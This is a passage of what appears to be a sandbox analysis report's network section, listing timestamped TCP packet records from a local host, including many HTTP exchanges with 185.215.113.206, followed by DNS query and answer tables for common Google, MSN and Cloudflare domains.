Nov 26, 2024 00:25:48.878861904 CET	49897	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.878896952 CET	443	49897	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.878897905 CET	49896	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.878953934 CET	49897	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.879441023 CET	49898	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.879451036 CET	443	49898	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.879512072 CET	49898	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.879898071 CET	49899	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.879909039 CET	443	49899	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.879949093 CET	49899	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.880170107 CET	49900	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.880213976 CET	443	49900	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.880259991 CET	49900	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.880315065 CET	49901	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.880332947 CET	443	49901	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.880387068 CET	49901	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.880821943 CET	49896	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.880836010 CET	443	49896	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.880995989 CET	49897	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.881009102 CET	443	49897	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.881326914 CET	49898	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.881336927 CET	443	49898	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.881505966 CET	49899	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.881517887 CET	443	49899	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.881654024 CET	49900	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.881664038 CET	443	49900	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.881768942 CET	49901	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.881783009 CET	443	49901	104.117.182.56	192.168.2.6
Nov 26, 2024 00:25:48.886063099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.886132002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.886158943 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.886212111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.886789083 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.886840105 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.886874914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.886929035 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.887433052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.887478113 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.887532949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.887574911 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.888572931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.888644934 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.888650894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.888693094 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.889730930 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.889791965 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.889925957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.889971018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.890912056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.890953064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.891006947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.891051054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.892122030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.892134905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.892163038 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.892179966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.893263102 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.893332005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.893415928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.893459082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.894435883 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.894520044 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.894556999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.894592047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.895622969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.895668983 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.895735025 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.895776987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.896823883 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.896876097 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.896992922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.897109985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.897980928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.898075104 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.898101091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.898139000 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.899163961 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.899231911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.899230957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.899569988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.900326967 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.900393963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.900443077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.900602102 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.901483059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.901559114 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.901596069 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.901633024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.902681112 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.902733088 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.902793884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.902829885 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.903877974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.903923035 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.903990030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.904025078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.905009031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.905054092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.905090094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.905128956 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.906182051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.906224966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.906281948 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.906454086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.907382965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.907423973 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.907489061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.907532930 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.908545017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.908598900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.908689022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.908862114 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.909729958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.909817934 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.909878969 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.910860062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.910914898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.915918112 CET	443	49884	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.915998936 CET	49884	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.919150114 CET	443	49883	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.919218063 CET	49883	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.936086893 CET	49884	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.936110973 CET	443	49884	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.936252117 CET	49884	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.936260939 CET	443	49884	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.936415911 CET	443	49884	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.936475992 CET	49884	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.936877966 CET	49883	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.936907053 CET	443	49883	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.937048912 CET	49883	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.937053919 CET	443	49883	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.937253952 CET	443	49883	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.937546968 CET	49883	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.973134041 CET	443	49882	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.973376036 CET	49882	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.975825071 CET	49882	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.975843906 CET	443	49882	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.976057053 CET	49882	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.976064920 CET	443	49882	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.976103067 CET	443	49882	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.976155043 CET	49882	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.977179050 CET	443	49885	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.977251053 CET	49885	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.983829975 CET	49885	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.983850956 CET	443	49885	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.984112978 CET	443	49885	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:48.984179020 CET	49885	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:48.984258890 CET	49885	443	192.168.2.6	150.171.27.10
Nov 26, 2024 00:25:49.011130095 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.011218071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.011250973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.011378050 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.011641026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.011693001 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.011754990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.011800051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.012564898 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.012628078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.012639046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.012681961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.013706923 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.013761997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.013816118 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.013868093 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.014885902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.014946938 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.015010118 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.015055895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.016011953 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.016071081 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.016110897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.016189098 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.017272949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.017287016 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.017326117 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.017370939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.018404007 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.018425941 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.018491983 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.018510103 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.019644976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.019726992 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.019737005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.019794941 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.020768881 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.020828962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.020908117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.020960093 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.021924973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.021996975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.021996975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.022124052 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.023128986 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.023207903 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.023241043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.023288012 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.024301052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.024396896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.024410963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.024441957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.025434017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.025513887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.025569916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.025620937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.026736975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.026818037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.026834965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.026882887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.027331114 CET	443	49885	150.171.27.10	192.168.2.6
Nov 26, 2024 00:25:49.027775049 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.027887106 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.027959108 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.028023958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.029014111 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.029088974 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.029227972 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.029283047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.030198097 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.030252934 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.030410051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.030462980 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.031328917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.031394958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.031447887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.031488895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.032511950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.032599926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.032646894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.032690048 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.033725977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.033839941 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:49.033941031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:49.033999920 CET	49795	80	192.168.2.6	185.215.113.206

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 00:25:20.514595985 CET	192.168.2.6	1.1.1.1	0x1bab	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:20.514756918 CET	192.168.2.6	1.1.1.1	0xc81	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:27.522139072 CET	192.168.2.6	1.1.1.1	0x20d6	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:27.522389889 CET	192.168.2.6	1.1.1.1	0x6b65	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:32.732988119 CET	192.168.2.6	1.1.1.1	0xcbd6	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:32.733849049 CET	192.168.2.6	1.1.1.1	0x6553	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:34.999289036 CET	192.168.2.6	1.1.1.1	0x47f7	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:34.999442101 CET	192.168.2.6	1.1.1.1	0xd96d	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 26, 2024 00:25:35.797852993 CET	192.168.2.6	1.1.1.1	0x9195	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:35.798002005 CET	192.168.2.6	1.1.1.1	0x9919	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:36.597321987 CET	192.168.2.6	1.1.1.1	0x946	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.597589970 CET	192.168.2.6	1.1.1.1	0x6ee1	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:36.597893953 CET	192.168.2.6	1.1.1.1	0xa74c	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.598185062 CET	192.168.2.6	1.1.1.1	0xb7fd	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:36.628823042 CET	192.168.2.6	1.1.1.1	0x3805	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.628987074 CET	192.168.2.6	1.1.1.1	0xad52	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:38.133101940 CET	192.168.2.6	1.1.1.1	0xa22e	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:38.134010077 CET	192.168.2.6	1.1.1.1	0x1d81	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:38.147748947 CET	192.168.2.6	1.1.1.1	0x78af	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:38.147989035 CET	192.168.2.6	1.1.1.1	0x45e6	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:38.279087067 CET	192.168.2.6	1.1.1.1	0x9bec	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:38.279242992 CET	192.168.2.6	1.1.1.1	0x94a9	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 26, 2024 00:25:38.425685883 CET	192.168.2.6	1.1.1.1	0x6707	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:38.426023960 CET	192.168.2.6	1.1.1.1	0x2654	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 26, 2024 00:26:36.025278091 CET	192.168.2.6	1.1.1.1	0x6b90	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:26:36.025423050 CET	192.168.2.6	1.1.1.1	0x59ec	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
2024-11-25 23:25:38 UTC	192.168.2.6	162.159.61.3	0x0	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	true

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 00:25:20.656590939 CET	1.1.1.1	192.168.2.6	0x1bab	No error (0)	www.google.com		142.250.181.100	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:20.656635046 CET	1.1.1.1	192.168.2.6	0xc81	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 26, 2024 00:25:27.664061069 CET	1.1.1.1	192.168.2.6	0x20d6	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:27.664061069 CET	1.1.1.1	192.168.2.6	0x20d6	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:27.759908915 CET	1.1.1.1	192.168.2.6	0x6b65	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:32.874030113 CET	1.1.1.1	192.168.2.6	0xcbd6	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:32.874994993 CET	1.1.1.1	192.168.2.6	0x6553	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:33.422725916 CET	1.1.1.1	192.168.2.6	0xb23c	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:33.452336073 CET	1.1.1.1	192.168.2.6	0xa52a	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:33.452336073 CET	1.1.1.1	192.168.2.6	0xa52a	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:35.234811068 CET	1.1.1.1	192.168.2.6	0x47f7	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:35.237025023 CET	1.1.1.1	192.168.2.6	0xd96d	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:35.939476967 CET	1.1.1.1	192.168.2.6	0x9195	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:35.939476967 CET	1.1.1.1	192.168.2.6	0x9195	No error (0)	googlehosted.l.googleusercontent.com		172.217.19.225	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.031059027 CET	1.1.1.1	192.168.2.6	0x9919	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 26, 2024 00:25:36.736830950 CET	1.1.1.1	192.168.2.6	0x946	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.736830950 CET	1.1.1.1	192.168.2.6	0x946	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.736922026 CET	1.1.1.1	192.168.2.6	0xa74c	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.736922026 CET	1.1.1.1	192.168.2.6	0xa74c	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.736932993 CET	1.1.1.1	192.168.2.6	0x6ee1	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 26, 2024 00:25:36.736969948 CET	1.1.1.1	192.168.2.6	0xb7fd	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 26, 2024 00:25:36.767797947 CET	1.1.1.1	192.168.2.6	0xad52	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 26, 2024 00:25:36.772088051 CET	1.1.1.1	192.168.2.6	0x3805	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:36.772088051 CET	1.1.1.1	192.168.2.6	0x3805	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:38.275444031 CET	1.1.1.1	192.168.2.6	0xa22e	No error (0)	sb.scorecardresearch.com		18.165.220.110	A (IP address)	IN (0x0001)	false
Nov 26, 2024 00:25:38.275444031 CET	1.1.1.1	192.168.2.6	0xa22e	No error (0)	sb.scorecardresearch.com		18.165.220.57	A (IP address)	IN (0x0001)	false
